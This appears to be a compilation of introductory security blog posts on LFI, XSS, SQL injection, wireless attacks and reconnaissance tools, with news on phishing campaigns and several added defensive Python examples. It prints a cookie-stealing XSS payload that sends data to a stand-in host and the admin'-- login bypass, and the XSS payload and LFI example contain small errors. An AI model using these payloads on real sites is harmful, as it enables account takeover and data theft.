
How Do Hackers Upload Shellcodes Using LFI


What is Local File Inclusion (LFI)?

This is a vulnerability commonly found in web applications that rely on a scripting runtime. Local File Inclusion (LFI), or simply File Inclusion, refers to an inclusion attack through which an attacker can trick the web application into including files on the web server by exploiting functionality that dynamically includes local files or scripts.

LFI attacks can expose sensitive information, and in severe cases, they can lead to cross-site scripting (XSS) and remote code execution.

An attacker can use remote code execution to create a web shell on the web server, which can be used for website defacement.

How does Local File Inclusion Work?

Usually, the path of the file that you want to open is sent to a function that can then return the content of the file as a string, print it on the current web page, or include it into the document and parse it as application code in the relevant language.

The following is an example in PHP that is vulnerable to Local File Inclusion (LFI).

/**
 * Get the filename from a GET input
 * Example - http://example.com/?file=filename.php
 */
$file = $_GET['file'];

/**
 * Unsafely include the file
 * Example - filename.php
 */
include('directory/' . $file);

In the above example, an attacker could make the following request to trick the web application into executing a malicious script such as a webshell that the attacker managed to upload to the web server.

Here is an example of such a request:
https://example.com/?page=filename.php

Here, the file uploaded by the attacker will be included and run as the user running the web app. In this way the attacker can run any code they want on the web server.

From that point on, everything the attacker runs executes with the access the web application itself has on the server.

Protecting Against LFI Attacks

The simplest way to eliminate LFI vulnerabilities is to avoid dynamically including files based on user input. If this is not possible, the application should maintain a whitelist of files that can be included, in order to limit the attacker’s control over what gets included.
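The whitelist approach from the paragraph above, as an added example that is not the original post's code: a Python equivalent of the page's include('directory/' . $file) beside a resolver that only accepts file names from a fixed allowlist and then confirms the joined path still sits inside the include directory. The directory and page names are assumptions for the demo.

```python
"""Allowlist-based include resolution (added example, not the page's PHP)."""
import posixpath
from typing import Dict, List, Optional

# Hypothetical include directory and the only pages it may serve.
INCLUDE_DIR = "/var/www/app/directory"
ALLOWED_PAGES = frozenset({"home.php", "about.php", "contact.php"})


def vulnerable_include_path(user_file: str) -> str:
    """Mirror of the page's include('directory/' . $file): no validation at all."""
    return INCLUDE_DIR + "/" + user_file


def safe_include_path(user_file: str) -> Optional[str]:
    """Return the path to include, or None when the request is rejected.

    Controls, in order:
    1. Reject NUL bytes: some older runtimes truncated paths at the first NUL,
       which let a caller drop a fixed suffix such as ".php".
    2. Exact match against the allowlist, so user input only selects *which*
       known file is included and can never name a new one.
    3. Defense in depth: normalise the joined path and confirm its directory is
       exactly INCLUDE_DIR (catches any traversal that slipped past step 2).
    """
    if "\x00" in user_file:
        return None
    if user_file not in ALLOWED_PAGES:
        return None
    candidate = posixpath.normpath(posixpath.join(INCLUDE_DIR, user_file))
    if posixpath.dirname(candidate) != INCLUDE_DIR:
        return None
    return candidate


def classify(requests: List[str]) -> Dict[str, str]:
    """For each value of the ?file= parameter, report the safe resolver's verdict."""
    return {value: ("allowed" if safe_include_path(value) else "rejected")
            for value in requests}


if __name__ == "__main__":
    # Constructed sample values of the ?file= parameter.
    samples = ["about.php", "../../../etc/passwd", "home.php\x00.txt", "uploads/x.php"]
    for value, verdict in classify(samples).items():
        print(f"{value!r:28} unsafe -> {vulnerable_include_path(value)!r:48} safe -> {verdict}")
```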

How Do Hackers Hijack Websites And Browsers Using XSS


What is Cross Site Scripting(XSS)?

Cross site scripting (XSS) is an attack in which an attacker injects malicious executable scripts into the code of a trusted application or website. The injected content is usually a combination of HTML and script supplied by the attacker, but XSS can also be used to deliver malicious downloads, plugins, or media content. In this case the attacker plants malicious links in the website or app.

If the app or website lacks proper data sanitization, the malicious link executes the attacker’s chosen code on the user’s system.

As a result, the attacker can steal the user’s active session cookie.
Here’s an example:

<script> i=new/**/Image();isrc=http://example.com/log.php?'+document.cookie+' '+document.location</script>

Because XSS allows untrusted users to execute code in the browsers of trusted users and to access data such as session cookies, attackers often obtain website credentials with which they gain full control of the site.

How does cross site scripting work?

Cross-site scripting works by manipulating a vulnerable website or application so that it returns malicious JavaScript to users. The attacker injects some code into it.

Attackers can also carry out an attack by modifying a request. As above, if the app or website lacks proper data sanitization, the malicious link executes the attacker’s chosen code on the user’s system, and the attacker can steal the user’s active session cookie.


While the payload is usually JavaScript, XSS can take place using any client-side language.

What does the attacker do with the credentials?

The attacker can do these things:

  • Hijacking a website and browser.
  • Capturing the keystrokes of a user.
  • Redirecting a user to a malicious website.
  • Running web browser-based exploits (e.g., crashing the browser).
  • Obtaining the cookie information of a user who is logged into a website (thus compromising the victim’s account).

In some cases, the XSS attack leads to a complete compromise of the victim’s account. Attackers can trick users into entering credentials on a fake form, which provides all the information to the attacker.

What are the different types of XSS attacks?

Stored XSS:-

Takes place when the malicious payload is stored in a database. It renders to other users when data is requested—if there is no output encoding or sanitization.

Reflected XSS:-

Reflected XSS is the simplest variety of cross-site scripting. It arises when an application receives data in an HTTP request and includes that data within the immediate response in an unsafe way.

DOM-based XSS:-

DOM-based XSS (also known as DOM XSS) arises when an application contains some client-side JavaScript that processes data from an untrusted source in an unsafe way, usually by writing the data back to the DOM.

How to prevent XSS vulnerability?

There are some strategies to prevent XSS attacks:

  • Never trust user input.
  • Implement output encoding.
  • Perform user input validation.
  • Follow the defense in depth principle.
  • Ensure that web application development aligns with OWASP’s XSS Prevention Cheat Sheet.
  • After remediation, perform penetration testing to confirm it was successful.

Protect your organization by following secure development guidelines—building security in at all phases of the application’s development. Output encoding is also key to preventing XSS vulnerabilities. Make use of output encoding libraries that are relevant to the programming languages and frameworks your organization uses. Also, ensure your developers stay up-to-date with XSS prevention best practices.
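The output-encoding advice above, together with the session-cookie theft scenario earlier in this post, as an added example that is not code from the original post: a user comment is rendered both by plain concatenation and with HTML-body-context encoding, and a Set-Cookie value is built with the HttpOnly flag that keeps document.cookie from exposing the session id even when a script does execute. Function names and the sample comment are constructed for the demo.

```python
"""Output encoding and cookie hardening against stored/reflected XSS (added example)."""
import html
from typing import List

# Hypothetical HTML-body template into which a comment is rendered.
TEMPLATE = '<p class="comment">{body}</p>'


def render_unsafe(comment: str) -> str:
    """Plain concatenation: whatever the user typed becomes markup."""
    return TEMPLATE.format(body=comment)


def render_safe(comment: str) -> str:
    """HTML-body context: encode &, <, > and both quote characters.

    The browser now shows the literal characters instead of parsing a tag,
    so the injected script never runs.
    """
    return TEMPLATE.format(body=html.escape(comment, quote=True))


def contains_active_markup(rendered: str) -> bool:
    """Did a raw <script tag survive rendering? (used to compare both renderers)"""
    return "<script" in rendered.lower()


def session_cookie(session_id: str, secure: bool = True) -> str:
    """Set-Cookie value with the flags that limit what an injected script can do.

    HttpOnly: document.cookie cannot read it, so the page's log.php-style
              payload would exfiltrate an empty cookie string.
    Secure:   the browser only sends it over TLS.
    SameSite: the browser does not attach it to cross-site requests by default.
    """
    parts: List[str] = [f"session={session_id}", "Path=/", "HttpOnly", "SameSite=Lax"]
    if secure:
        parts.insert(2, "Secure")
    return "; ".join(parts)


if __name__ == "__main__":
    # Constructed comment shaped like an injected script (calls nothing real).
    comment = "<script>stealCookie()</script> nice post!"
    print("unsafe :", render_unsafe(comment))
    print("encoded:", render_safe(comment))
    print("cookie :", session_cookie("constructed-session-id"))
```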

How Hackers Leak Databases | SQL Injection Vulnerability


What is SQL injection?

The Wikipedia article on SQL injection reads:

SQL injection is a code injection technique, used to attack data driven applications, in which malicious SQL statements are inserted into an entry field for execution.

SQL Injection is a web-based attack used by hackers to steal sensitive information from organizations through web applications. It is one of the most common application layer attacks used today. This attack takes advantage of improper coding of web applications, which allows hackers to exploit the vulnerability by injecting SQL commands into the web application’s inputs.

The underlying fact that allows for SQL injection is that the fields available for user input in the web application allow SQL statements to pass through and interact with or query the database directly.

For example, let’s consider a web application that implements a form-based login mechanism to store the user credentials and performs a simple SQL query to validate each login attempt.

Here is a typical example:

select * from users where username='admin' and password='admin123';

If the attacker knows the username of the application administrator is admin, he can log in as admin without supplying any password.

admin'--

The query in the back-end then looks like:

select * from users where username='admin'--' and password='xxx';

Note that the comment sequence (--) causes the rest of the query to be ignored, so the query executed is equivalent to:

select * from users where username='admin';

So the password check is bypassed.
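The bypass walked through above and its fix, as an added example that is not part of the original post: the users table from the text is recreated in an in-memory SQLite database, and the same admin'-- input is run through a query built by string concatenation and through a query with bound parameters. The table contents are constructed, and the plaintext password column only mirrors the page's example (credentials should be stored as salted hashes).

```python
"""Login check: concatenated SQL versus a parameterised query (added example)."""
import sqlite3
from typing import Dict


def make_db() -> sqlite3.Connection:
    """Constructed users table matching the page's example query."""
    conn = sqlite3.connect(":memory:")
    conn.execute("create table users (username text, password text)")
    conn.executemany("insert into users values (?, ?)",
                     [("admin", "admin123"), ("alice", "hunter2")])
    conn.commit()
    return conn


def login_vulnerable(conn: sqlite3.Connection, username: str, password: str) -> bool:
    """The page's query built by concatenation.

    With username "admin'--" the statement becomes
        select * from users where username='admin'--' and password='...'
    and everything after -- is a comment, so the password clause disappears.
    """
    query = (f"select * from users where username='{username}' "
             f"and password='{password}'")
    return conn.execute(query).fetchone() is not None


def login_safe(conn: sqlite3.Connection, username: str, password: str) -> bool:
    """Same query with placeholders: the input is bound as a value and can
    never change the statement's structure, so "admin'--" is just a username
    that does not exist."""
    query = "select * from users where username=? and password=?"
    return conn.execute(query, (username, password)).fetchone() is not None


def compare(username: str, password: str) -> Dict[str, bool]:
    """Run one login attempt through both implementations."""
    conn = make_db()
    try:
        return {"vulnerable": login_vulnerable(conn, username, password),
                "safe": login_safe(conn, username, password)}
    finally:
        conn.close()


if __name__ == "__main__":
    for creds in [("admin", "admin123"), ("admin'--", "xxx"), ("admin", "wrong")]:
        print(creds, compare(*creds))
```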

Wireless Hacking Basic Knowledge


Wireless Network Sniffing :-

Sniffing is eavesdropping on the network. A (packet) sniffer is a program that intercepts and decodes network traffic broadcast through a medium. It is easier to sniff wireless networks than wired ones. Sniffing can also help find the easy kill as in scanning for open access points that allow anyone to connect, or capturing the passwords used in a connection session that does not even use WEP, or in telnet, rlogin and ftp connections.

Stations and Access Points :-

A wireless network interface card (adapter) is a device, called a station, providing the network physical layer over a radio link to another station.
An access point (AP) is a station that provides frame distribution service to stations associated with it.
The AP itself is typically connected by wire to a LAN. Each AP has a 0- to 32-byte-long Service Set Identifier (SSID) that is also commonly called a network name. The SSID is used to segment the airwaves for usage.

Passive Scanning :-

Scanning is the act of sniffing by tuning to various radio channels of the devices. A passive network scanner instructs the wireless card to listen to each channel for a few messages. This does not reveal the presence of the scanner. An attacker can passively scan without transmitting at all.

Channels :-

The stations communicate with each other using radio frequencies between 2.4 GHz and 2.5 GHz. Neighboring channels are only 5 MHz apart. Two wireless networks using neighboring channels may interfere with each other.

Wired Equivalent Privacy (WEP) :-

It is a shared-secret key encryption system used to encrypt packets transmitted between a station and an AP. The WEP algorithm is intended to protect wireless communication from eavesdropping. A secondary function of WEP is to prevent unauthorized access to a wireless network. WEP encrypts the payload of data packets. Management and control frames are always transmitted in the clear. WEP uses the RC4 encryption algorithm.

Detection of SSID :-

The attacker can discover the SSID of a network usually by passive scanning because the SSID occurs in the following frame types: Beacon, Probe Requests, Probe Responses, Association Requests, and Reassociation Requests. Recall that management frames are always in the clear, even when WEP is enabled.
When the above methods fail, SSID discovery is done by active scanning.

Collecting the Frames for Cracking WEP :-

The goal of an attacker is to discover the WEP shared-secret key. The attacker sniffs a large number of frames. An example of a WEP cracking tool is AirSnort ( http://airsnort.shmoo.com ).

Detection of the Sniffers :-

Detecting the presence of a wireless sniffer, who remains radio-silent, through network security measures is virtually impossible. Once the attacker begins probing (i.e., by injecting packets), the presence and the coordinates of the wireless device can be detected.

Wireless Spoofing :-

There are well-known attack techniques known as spoofing in both wired and wireless networks. The attacker constructs frames by filling selected fields that contain addresses or identifiers with legitimate looking but non-existent values, or with values that belong to others. The attacker would have collected these legitimate values through sniffing.

Denial of Service :-

A denial of service (DoS) occurs when a system is not providing services to authorized clients because of resource exhaustion by unauthorized clients. In wireless networks, DoS attacks are difficult to prevent and difficult to stop once under way, and the victim and its clients may not even detect the attacks. The duration of such a DoS may range from milliseconds to hours. A DoS attack against an individual station enables session hijacking.

MAC Address Spoofing :-

The attacker generally desires to be hidden. But the probing activity injects frames that are observable by system administrators. The attacker fills the Sender MAC Address field of the injected frames with a spoofed value so that his equipment is not identified.

IP spoofing :-

Replacing the true IP address of the sender (or, in rare cases, the destination) with a different address is known as IP spoofing. This is a necessary operation in many attacks.

Frame Spoofing :-

The attacker will inject frames that are valid but whose content is carefully spoofed.

Wireless Network Probing :-

The attacker then sends artificially constructed packets to a target that trigger useful responses. This activity is known as probing or active scanning.

AP Weaknesses :-

APs have weaknesses that are both due to design mistakes and user interfaces.

Trojan AP :-

An attacker sets up an AP so that the targeted station receives a stronger signal from it than what it receives from a legitimate AP.

War Driving :-

Equipped with wireless devices and related tools, and driving around in a vehicle or parking at interesting places with a goal of discovering easy-to-get-into wireless networks is known as war driving. War-drivers (http://www.wardrive.net) define war driving as “The benign act of locating and logging wireless access points while in motion.” This benign act is of course useful to the attackers.
Regardless of the protocols, wireless networks will remain potentially insecure because an attacker can listen in without gaining physical access.

Jamming the Air Waves :-

A number of consumer appliances such as microwave ovens, baby monitors, and cordless phones operate on the unregulated 2.4 GHz radio frequency. An attacker can unleash large amounts of noise using these devices and jam the airwaves so that the signal-to-noise ratio drops so low that the wireless LAN ceases to function.

Tips for Wireless Home Network Security

  • Change Default Administrator Passwords (and Usernames)
  • Turn on (Compatible) WPA / WEP Encryption
  • Change the Default SSID
  • Disable SSID Broadcast
  • Assign Static IP Addresses to Devices
  • Enable MAC Address Filtering
  • Turn Off the Network During Extended Periods of Non-Use
  • Position the Router or Access Point Safely

Information Gathering – First Step Of Hacking


What’s information gathering?

When it comes to getting a clear information gathering concept, the simplest way to define it would be the process of collecting information about something you are interested in. A practical example: gathering information with your eyes is called visual perception. In the same way, in the digital world, a lot of information can be gathered in different ways, not with your senses, but with several methods, tools and techniques.

Information gathering is a phase of penetration testing or ethical hacking in which hackers or attackers gather as much information as possible related to the target’s internal and external security architecture.

They have to face a target. The details of any system help the attacker identify the vulnerabilities within it, which can be exploited to gain access in later phases.

Deep knowledge about the target reduces the focus area and brings you closer to the target. The more information about the target, the more possibilities to win.

If you have enough of the required details about the target, you are close to getting the key to hacking it.

For example, you narrow down the target by means of the range of IP addresses you have to go through, or by its domain information, and so on.

What are the objectives of information gathering in cybersecurity?

Any basic cybersecurity information gathering process often includes these two types of data collection goals:

  • Collecting network data: Such as public, private and associated domain names, network hosts, public and private IP blocks, routing tables, TCP and UDP running services, SSL certificates, open ports and more.
  • Collecting system-related information: This includes user enumeration, system groups, OS hostnames, OS system type (probably by fingerprinting), system banners (as seen in the banner grabbing blog post), etc.

But there’s a lot more involved. Let’s learn about it, by exploring the most popular techniques used during this phase.

Information gathering techniques and methods

Ethical hackers use a big variety of techniques and tools to get this precious information about their targets, as well as locations and data collection software they’ll be using towards the information gathering goal.

Let’s look at the top information gathering methods used to gather information about any target.

How to gather information?

  • Social engineering: This includes in-person chat, phone conversations and email spoofing attacks. What all these methods have in common is the psychology of human weakness, needed to get maximum data about the target.
  • Search engines: Web crawlers can be used to fetch information about anything, and this includes companies, persons, services, and even real hacks, as seen in our previous article about Google Hacking.
  • Social networks: Facebook, Twitter, LinkedIn and other social networks are great sources of information to build a profile, especially when targeting individuals.
  • Domain names: These are registered by organizations, governments, public and private agencies, and people. Therefore, they’re a great starting point when you want to investigate someone. Personal information, associated domains, projects, services and technologies can be found by inspecting domain name information.
  • Internet servers: authoritative DNS servers are a great source of information, as they often include every single surface point exposed to the Internet—which means a direct link to related services such as HTTP, email, etc.

All these techniques are really useful when combined with enterprise security tools. Keep reading to discover how to maximize your information gathering results by using some really cool infosec utilities.

Information gathering tools

There are a lot of tools to discuss when talking about information gathering, including one particular software we can’t avoid mentioning… that’s Kali Linux, one of the most popular cyber security linux distributions around.

We’ve written about the top Kali Linux tools before, but that was a general review of the most popular tools on that Linux distro. When it comes to information gathering, Kali Linux includes one of the biggest collections ever. To be precise, exactly 67 information gathering utilities will help you get all the valuable data you need during your infosec investigations. Creating a full list of all the information gathering tools available would be monumental, not to mention difficult.

That’s why we’ve created a summary of the top 12 most popular tools that, in our experience, may help you during your information gathering process:

  • Nmap: Our beloved network scanner will be always in the #1 position when it comes to data gathering tools. It can be used not only to scan ports and service fingerprinting, but also as a DNS enumeration and network mapping tool.
  • Unicornscan: Combined with Nmap, it can give you the complete picture of any remote network or host, as it is able to perform asynchronous stateless TCP scanning with all variations of TCP flags, as well as TCP banner grabbing, async UDP Scanning, OS fingerprinting, and much more.
  • Sublist3r: This is one of the best subdomain enumeration tools around, one that will help you create a virtual subdomain map of any website in no time. By using Google dorks and other search engines such as Baidu, Ask, Yahoo or Bing, it can also be used to perform a brute force subdomain discovery attack with wordlists, thanks to its subroute integration.
  • DMitry: Its name stands for Deepmagic Information Gathering Tool, and is one of the top terminal-based tools when it comes to intel reconnaissance tasks. It will allow you to get any available data from any host, such as subdomains, email addresses, open ports, WHOIS lookups, server data, and more.
  • OWASP Amass: Also known simply as ‘Amass’, this information gathering tool helps researchers and IT administrators create a full map of their digital assets by providing an easy way to perform DNS enumeration, asset location, and overall attack surface discovery.
  • Axiom: This new tool is one of the best available when you need to get massive amounts of data in a limited time. It’s basically a dynamic infrastructure framework that helps system administrators and researchers build and deploy offensive and defensive security multi-cloud infrastructure in mere seconds, by using pre-installed tools based on OS images.
  • Th3inspector: This infosec utility will enable you to fetch all kinds of website-related information, such as page data, phone number, IP addresses of the HTTP and email server, perform a domain WHOIS lookup, bypass the Cloudflare proxy, check the age of your domain name, scan remote active services, map subdomains, and even work as a CMS detector.
  • Devploit: This tool is used to extract DNS and domain data, including DNS lookups, WHOIS lookup information, reverse IP info, port scanning, DNS zone transfer, HTTP-headers, GEOIP lookup, subnet lookup, etc.
  • Bettercap: Known as the swiss army knife for networking, it’s used mostly for network recon and information gathering, especially for WiFi, Bluetooth low energy devices and Ethernet networks.
  • Traceroute: As one of the most popular network tools used to track the path of network packets from one IP address to another, it’s a powerful recon tool that will let you gain critical network information about IP addresses and networking routes.
  • WHOIS: The WHOIS command is a great source of data for fetching domain- and IP-related information, including tech and admin names, telephones, addresses, country, DNS servers, etc.
  • Dig: Whenever you need to find current data about DNS records, Dig is one of the best tools there is to help you to accomplish that task, whether you want to get A, NS, TXT or CNAME records.

TODAYZOO PHISHING KIT USED TO SWIPE MICROSOFT CREDENTIALS

Microsoft has detailed an unusual phishing campaign aimed at stealing passwords that uses a phishing kit built using pieces of code copied from other hackers’ work.

A “phishing kit” is the various software or services designed to facilitate phishing attacks. In this case, the kit has been called TodayZoo by Microsoft after some text used by the kit. Microsoft also described it as a ‘Franken-Phish’ because it is made up of different elements, some available for sale through publicly accessible scam sellers or reused and repackaged by other kit resellers.

Microsoft said TodayZoo is using the WorkMail domain AwsApps[.]com to pump out email with links to phishing pages mimicking the Microsoft 365 login page.

Microsoft says the attackers have been creating malicious AWS WorkMail accounts “at scale” but are just using randomly generated domain names instead of names that would represent a legitimate company.

In other words, it’s a crude phishing product likely made on a thin budget, but large enough to be noticeable. It caught Microsoft’s attention because it impersonated Microsoft’s brand and used a technique called “zero-point font obfuscation” – HTML text with a zero font size in an email – to dodge human detection.
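A mail-filter check for the zero-point font trick described above, as an added example that is not from the article or from Microsoft's report: the standard-library HTML parser walks a message body, marks every element whose inline style sets font-size to 0, and separates the text a human would see from the text hidden that way, so a filter can score the message or strip the hidden runs before keyword inspection. The sample message and the threshold are constructed for the demo.

```python
"""Detect zero-point (font-size:0) hidden text in an HTML email body (added example)."""
import re
from html.parser import HTMLParser
from typing import List, Tuple

# Matches font-size values of 0, 0px, 0.0pt, 0em, 0% ... inside an inline style.
ZERO_FONT = re.compile(
    r"font-size\s*:\s*0(?:\.0+)?(?:px|pt|em|rem|%)?\s*(?:;|$|!important)", re.I)

# Elements that never have a closing tag; they must not affect nesting depth.
VOID_TAGS = {"br", "img", "hr", "input", "meta", "link", "area", "base",
             "col", "embed", "source", "track", "wbr"}


class ZeroFontScanner(HTMLParser):
    """Collects visible and hidden text while tracking zero-font nesting."""

    def __init__(self) -> None:
        super().__init__()
        self._stack: List[bool] = []   # one flag per open element: hidden or not
        self._hidden_depth = 0         # > 0 while inside any zero-font element
        self.visible: List[str] = []
        self.hidden: List[str] = []

    def handle_starttag(self, tag, attrs):
        if tag in VOID_TAGS:
            return
        style = dict(attrs).get("style") or ""
        is_hidden = bool(ZERO_FONT.search(style))
        self._stack.append(is_hidden)
        if is_hidden:
            self._hidden_depth += 1

    def handle_endtag(self, tag):
        # Approximation: real mail HTML is often unbalanced, so we pop by
        # position rather than by tag name.
        if tag in VOID_TAGS or not self._stack:
            return
        if self._stack.pop():
            self._hidden_depth -= 1

    def handle_data(self, data):
        text = data.strip()
        if text:
            (self.hidden if self._hidden_depth else self.visible).append(text)


def scan(html_body: str) -> Tuple[str, str]:
    """Return (visible_text, hidden_text) for an HTML message body."""
    scanner = ZeroFontScanner()
    scanner.feed(html_body)
    scanner.close()
    return " ".join(scanner.visible), " ".join(scanner.hidden)


def is_suspicious(html_body: str, min_hidden_chars: int = 20) -> bool:
    """Flag a body that hides at least min_hidden_chars of text via zero-point fonts."""
    return len(scan(html_body)[1]) >= min_hidden_chars


# Constructed sample: brand name split by an invisible span, plus a zero-font
# block of filler meant to confuse keyword-based filters.
SAMPLE_EMAIL = """<html><body>
<p>Your Micro<span style="font-size:0px;">xqz</span>soft 365 password expires today.</p>
<div style="font-size: 0; color: #fff;">lorem ipsum filler text to confuse keyword filters</div>
<p>Sign in to keep your account.</p>
</body></html>"""

if __name__ == "__main__":
    visible, hidden = scan(SAMPLE_EMAIL)
    print("visible:", visible)
    print("hidden :", hidden)
    print("suspicious:", is_suspicious(SAMPLE_EMAIL))
```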

Microsoft detected an uptick in zero-font attacks in July. TodayZoo campaigns in April and May of this year typically impersonated Microsoft 365 login pages and a password-reset request. However, Microsoft found that campaigns in August used Xerox-branded fax and scanner notifications to dupe workers into giving up credentials.

Microsoft’s threat researchers have found that most of the phishing landing pages were hosted within cloud provider DigitalOcean.

Those pages were identical to the Microsoft 365 sign-in page. Another unusual trait was that after harvesting credentials, the stolen information was not forwarded to other email accounts but stored on the site itself. This behaviour was a trait of the TodayZoo phishing kit, which has previously focused on phishing credentials from Zoom video-meeting accounts.

But Microsoft researchers believe this phishing group is a single operation rather than a network of agents.

“While many phishing kits are attributed to a wide variety of email campaign patterns and, conversely, many email campaign patterns are associated with many phishing kits, TodayZoo-based pages exclusively utilized the same email campaign patterns, and any of those subsequent email campaigns only surfaced TodayZoo kits.

These lead us to believe that the actors behind this specific TodayZoo implementation are operating on their own,” Microsoft said. Microsoft says it informed Amazon about the TodayZoo phishing campaign and that AWS “promptly took action”.

Google Tracking 270 State-Sponsored Hacker Groups From Over 50 Countries

Google’s Threat Analysis Group (TAG) on Thursday said it’s tracking more than 270 government-backed threat actors from more than 50 countries, adding that it has sent approximately 50,000 alerts of state-sponsored phishing or malware attempts to customers since the start of 2021.

The warnings mark a 33% increase from 2020, the internet giant said, with the spike largely stemming from “blocking an unusually large campaign from a Russian actor known as APT28 or Fancy Bear.”

Additionally, Google said it disrupted a number of campaigns mounted by an Iranian state-sponsored attacker group tracked as APT35 (aka Charming Kitten, Phosphorus, or Newscaster), including a sophisticated social engineering attack dubbed “Operation SpoofedScholars” aimed at think tanks, journalists, and professors, with the aim of soliciting sensitive information by masquerading as scholars with the University of London’s School of Oriental and African Studies (SOAS).


Details of the attack were first publicly documented by enterprise security firm Proofpoint in July 2021. Other past attacks involved the use of a spyware-infested VPN app uploaded to the Google Play Store that, when installed, could be leveraged to siphon sensitive information such as call logs, text messages, contacts, and location data from the infected devices.

Furthermore, an unusual tactic adopted by APT35 concerned the use of Telegram to notify the attackers when phishing sites under their control have been visited in real-time via malicious JavaScript embedded into the pages. The threat actor is also said to have impersonated policy officials by sending “non-malicious first contact email messages” modeled around the Munich Security and Think-20 (T20) Italy conferences as part of a phishing campaign to lure high-profile individuals into visiting rogue websites.

“For years, this group has hijacked accounts, deployed malware, and used novel techniques to conduct espionage aligned with the interests of the Iranian government,” Google TAG’s Ajax Bash said.